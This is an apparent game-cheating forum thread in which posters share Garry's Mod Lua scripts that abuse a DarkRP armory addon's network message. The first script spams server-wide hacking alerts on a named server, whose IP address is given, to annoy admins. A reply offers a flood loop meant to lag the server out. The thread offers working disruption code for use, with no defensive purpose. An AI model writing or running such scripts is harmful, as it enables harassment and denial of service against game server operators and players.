OutdatedDARKRP SERVER EXPLOIT [Armory Spam]

Posts 16 of 6 · Page 1 of 1
DARKRP SERVER EXPLOIT [Armory Spam]
So I was bored on this shitty server and found that everytime you "Try" to exploit this Armory Robbery Addon It Sends the whole server a message saying that you are hacking so what i did was make this code that spams it and it really annoys the admins have fun

SERVER NAME: TTT-FUN DarkRP| 45+ Jobs| Pokemon| Mining
ADDRESS: 206.221.182.118:27015 (connect 206.221.182.118:27015)

Code:
function hit()
timer.Create( "msgspam", 0.1, 0, hit )
	net.Start("ARMORY_RetrieveWeapon")
			net.WriteString("weapon3")
		net.SendToServer()
end
concommand.Add("hakme", hit)

Enjoy


[EDIT]

This should work for all servers running this addon
ratchet code but nice idea
/Moved to the correct section.
Quote Originally Posted by XxskaterxX100 View Post
So I was bored on this shitty server and found that everytime you "Try" to exploit this Armory Robbery Addon It Sends the whole server a message saying that you are hacking so what i did was make this code that spams it and it really annoys the admins have fun

SERVER NAME: TTT-FUN DarkRP| 45+ Jobs| Pokemon| Mining
ADDRESS: 206.221.182.118:27015 (connect 206.221.182.118:27015)

Code:
function hit()
timer.Create( "msgspam", 0.1, 0, hit )
	net.Start("ARMORY_RetrieveWeapon")
			net.WriteString("weapon3")
		net.SendToServer()
end
concommand.Add("hakme", hit)

Enjoy


[EDIT]

This should work for all servers running this addon
Haven't test it but you could maybe lag out the server using this;

Code:
function Lag()
	for i = 0, 1300 do
		net.Start("ARMORY_RetrieveWeapon")
		net.WriteString("weapon3")
		net.SendToServer()
	end
end
hook.Add("Think", "", Lag)
Quote Originally Posted by Keepo123 View Post
Haven't test it but you could maybe lag out the server using this;

Code:
function Lag()
	for i = 0, 1300 do
		net.Start("ARMORY_RetrieveWeapon")
		net.WriteString("weapon3")
		net.SendToServer()
	end
end
hook.Add("Think", "", Lag)


Thats a good idea ill try it out!
How do I use them?
Posts 16 of 6 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Need help?